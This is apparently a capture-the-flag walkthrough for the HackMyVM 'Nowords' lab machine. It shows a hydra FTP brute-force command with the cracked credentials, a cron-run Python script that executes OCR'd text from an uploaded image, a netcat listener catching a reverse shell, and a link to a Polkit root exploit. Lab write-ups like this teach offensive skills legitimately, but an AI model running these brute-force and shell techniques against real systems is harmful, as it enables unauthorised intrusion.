HackMyVm Nowords Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Nowords

Below is main steps.

Nmap scan ports, scan port 80, found hints at index.html.

 ~ curl http://192.168.56.100/index.html        
 Hint inside.

 <!-- [usernames and passwords are lowercase] -->

Download robots.txt, it's actually an PNG file, with some strings in it.

[image-20210707134241221.png]

OCR the strings online, make a dic, and scan port 80 again, found only 1 valid files. Download it, and it's actually a JPG file with some strings.

[image-20210707134856042.png]

OCR again, lower the first char of each word, make a dic. Then brute force ftp.

~ hydra -L pass2.txt -P pass2.txt 192.168.56.100 -t 64 ftp -f                                                                                                                                   fish-0 | 0 [12:54:58]
 Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

 Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-06 12:55:22
 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
 [DATA] max 64 tasks per 1 server, overall 64 tasks, 5776 login tries (l:76/p:76), ~91 tries per task
 [DATA] attacking ftp://192.168.56.100:21/
 [21][ftp] host: 192.168.56.100   login: sophie   password: natalia
 [STATUS] attack finished for 192.168.56.100 (valid pair found)
 1 of 1 target successfully completed, 1 valid password found
 Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-07-06 12:56:28

Through the ftp, we can browse the whole machine. In /home/sophie, found command.jpg and log.txt.

In /home/me, found doit.py.

 ~ cat doit.py                                                                        fish-0 | 0 [13:50:38]
 #!/usr/bin/python3
 # coding: utf-8

 import pytesseract
 import os
 try:
     import Image, ImageOps, ImageEnhance, imread
 except ImportError:
     from PIL import Image, ImageOps, ImageEnhance

 def solve_captcha(path):
     captcha = pytesseract.image_to_string(Image.open(path))
     return captcha

 if __name__ == '__main__':
     text = solve_captcha("/home/sophie/command.jpg")
     a = text.split("\n")
     f = open("/home/sophie/log.txt","w")
     f.write(" Executing: "+text)
     f.close()
     os.system(a[0])

The script means, we need to put and bash command in command.jpg, then cron job will do OCR and run the command.

We put shell code in command.jpg, then upload through ftp.

[image-20210707135227171.png]

Wait a minute, we will get reverse shell.

 ~ nc -nlvp 1234                                                                                                                                                                                 fish-0 | 0 [13:09:25]
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:49930.
 bash: cannot set terminal process group (136083): Inappropriate ioctl for device
 bash: no job control in this shell
 sophie@nowords:~$

The root step is use the Ubuntu Polkit Vulnerability.

Check the POC here.

https://github.com/Almorabea/Polkit-exploit

[image-20210707134038343.png]